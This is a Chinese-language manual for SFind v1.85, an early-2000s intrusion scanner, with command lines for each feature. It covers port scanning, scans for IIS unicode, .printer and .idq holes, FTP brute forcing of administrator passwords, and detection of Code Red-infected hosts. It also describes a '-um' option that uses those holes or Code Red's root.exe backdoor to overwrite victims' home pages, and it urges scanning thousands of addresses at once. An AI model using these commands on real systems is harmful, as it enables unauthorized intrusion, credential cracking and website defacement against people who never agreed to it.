入侵扫描工具(SFind.exe) v1.85 绿色版

sfind.exe是一款很优秀的扫描工具，被部分黑客用来入侵但其实是安全工具,临时推出SFindV1.85，增加了红色代码病毒主机的扫描，-um功能支持红色代码主机，可以直接修改其主页，提供暴力破解ftp测试，此版的暴力破解为测试用，希望个位网友能及时将测试结果以及测试环境发给我，使SFind的暴力破解功能尽快推出，由于本人不智，耽误了V1.9的正常发布，特此向各位道歉！！！同时也请您继续关注SFind的发展！谢谢！！
　　FTP暴力破解测试方法：SFind -cracker FTP ftp服务器地址 用户名 smallletter
　　红色部分为用户填写，其余参数不变，参数smllletter是指探测密码类型，在此为小写字符~
　　使 用 说 明
　　SFind是一款命令方式的多线程扫描工具，最大的特点是它不包含任何附属文件，体积小、扫描速度快、携
　　带方便，扫描进度显示，仅仅只有一个EXE文件，在扫描完成后将结果保存到sfind.txt中。目前支持的功能
　　有(请大家支持本软件，一起找BUG，谢谢！)：
　　端口扫描
　　CGI漏洞扫描
　　unicode漏洞扫描
　　.printer漏洞扫描
　　.idq漏洞扫描
　　FTP 匿名登陆扫描、通过FTP扫描administrator弱密码
　　codered 病毒主机扫描 新功能！！！
　　利用unicode漏洞直接修改主页、利用codered病毒修改主页 新功能！！！
　　下面看看详细说明和运行实例：
　　-p <端口开始端口 结束端口> 〈IP 地址开始地址 结束地址〉
　　端口扫描
　　：此方式可以扫描标准端口、自定义端口、可以对某一段地址内的指定端口扫描,如果不指定端口则扫描标准端口，目前的标准端口为10个，分别是：21、23、25、53、79、80、110、1143、3389、5631。
　　SFind -p 192.168.0.1
　　扫描192.168.0.1的标准端口
　　SFind -p 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255范围内所有主机的标准端口
　　SFind -p 1 200 192.168.0.1
　　扫描192.168.0.1主机1到200的端口此方式只能一次扫描一台主机
　　SFind -p 21 192.168.0.1
　　扫描192.168.0.1主机的21端口
　　SFind -p 21 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255中所有开放21端口的主机,可以利用此功能查找开放终端服务(端口3389)的主机，也可以利用此功能快速查找中木马冰河(端口7626)的主机
　　-cgi
　　cgi漏洞扫描：目前可以检测784个CGI漏洞，此方式只能扫描一台主机
　　SFind -cgi 192.168.0.1
　　扫描192.168.0.1的CGI漏洞
　　-uni <开始地址> <结束地址>
　　unicode漏洞扫描：如果不指定结束地址则只扫描一台主机，如果找到漏洞主机可以使用-um功能进行页面修改
　　SFind -uni 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255范围内所有unicode漏洞主机
　　-pri <开始地址> <结束地址>
　　.printer漏洞扫描：这是个远程溢出漏洞，具体就不介绍了，如果不指定结束地址则扫描一台主机
　　SFind -pri 192.168.0.1 192.168.0.255
　　扫描192.168.0.1 192.168.0.255范围内所有存在.printer漏洞的主机
　　-idq <开始地址> <结束地址>
　　.idq漏洞扫描：扫描.idq远程溢出漏洞，如果不指定结束地址则扫描一台主机
　　SFind -idq 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255范围内所有存在.idq漏洞的主机
　　-um <信息>
　　对存在unicode漏洞的主机和有codered病毒的主机进行页面修改，默认的WEB路径是c:\inetpub\wwwroot,使用此功能在对方机器的指定目录生成index.htm、index.asp、default.htm、default.asp四个文件，文件信息自己定义，大家可以在自己的机器上试试此功能
　　SFind -um 192.168.0.1 Hacker+by+Sunw
　　此命令将在192.168.0.1的c:\inetpub\wwwroot目录生成上叙四个文件，内容为:HackerbySunw
　　SFind -um 192.168.0.1 c:\inetpub\ts Hacker+by+Sunw
　　此命令在192.168.0.1的c:\inetpub\ts目录生成上叙四个文件，内容为：Hacker by Sunw
　　在使用此功能时必须要有权限对目录进行操作，如果在wwwroot目录不成功，可以换到inetpub\ts目录，这个目录可以写，信息内容不能超过50个字符，可以是英文也可以是中文(如果是中文则不能超过25个字)，在写信息时空格字符用+号代替，中间不能有"<"、">"和"="符号。如果是上传到inetpub\ts目录，则可以通过在浏览器调用//xxx.xxx.xxx.xxx/ts/default.asp查看
　　-ftp <开始地址> <结束地址> [-admin]
　　FTP扫描：扫描允许匿名登陆的FTP服务器，如果加-admin参数则通过FTP服务器扫描administrator弱密码,如不指定结束地址则只扫描一台主机
　　SFind -ftp 192.168.0.1 192.168.0.255
　　此命令扫描192.168.0.1到192.168.0.255范围内所有允许匿名登陆的主机
　　SFind -ftp 192.168.0.1 192.168.0.255 -admin
　　此命令通过FTP服务器扫administrator弱密码，因为administrator在默认情况下是FTP服务的管理者，所以可以利用次特征扫描超级用户的口令。在绿盟xdowns56kModem上扫4000个ip地址绝不超过5分钟，所以利用此功能时请务必加大搜索力度，一次扫3000说什么也不过分
　　-codered <开始地址> <结束地址>
　　codered病毒主机扫描：扫描存在codered病毒的主机，此功能利用codered病毒会将cmd.exe复制到inetpub\ts目录下root.exe的特性进行测试,如果对方主机inetpub\ts目录存在root.exe则认为有codered病毒，可以直接通过浏览器调用root.exe,//地址/ts/root.exe？/c,具体的操作和unicode漏洞完全相同，如果要修改主页可以直接使用SFind的um功能！
　　SFind -codered 192.168.0.1 192.168.0.255
　　此命令扫描192.168.0.1 192.168.0.255范围内所有存在红色代码病毒的主机
　　本软件采用多线程扫描，如果网速过慢可能会拥挤导致无法正确扫描，可以按Ctrl+C中断扫描，在进行扫描时上次的扫描结果将被覆盖。
　　软件为免费软件可以任意复制，如果利用此软件做违法的事情，使用者自行承担责任。目前为测试版本，可能存在种种漏洞，如果您有发现或者有好的建议或意见请[email protected]也可以到我的主页 //sw_sun.myetang.com 留言给我，十分感谢您的测试！